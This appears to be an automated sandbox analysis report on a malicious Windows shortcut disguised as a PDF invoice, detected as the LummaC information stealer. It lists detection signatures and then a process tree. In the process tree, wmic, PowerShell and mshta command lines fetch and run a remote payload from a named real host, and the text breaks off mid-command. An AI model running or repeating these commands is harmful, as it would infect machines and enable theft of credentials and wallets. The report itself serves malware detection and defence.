Windows
Analysis Report
InvoiceNr274728.pdf.lnk
Overview
General Information
Detection: LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected AntiVM3
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to create processes via WMI
Creates processes via WMI
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects code into the Windows Explorer (explorer.exe)
LummaC encrypted strings found
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Classification
- System is w10x64
- WMIC.exe (PID: 6496 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://agrizone.ae/wp-content/plugins/jetpack/modules/markdown/jetpackhandler" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
- conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 4308 cmdline: powershell -w 1 . \W*\S*2\m*ht*e https://agrizone.ae/wp-content/plugins/jetpack/modules/markdown/jetpackhandler MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 1436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- mshta.exe (PID: 7112 cmdline: "C:\Windows\System32\mshta.exe" https://agrizone.ae/wp-content/plugins/jetpack/modules/markdown/jetpackhandler MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- powershell.exe (PID: 1892 cmdline:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '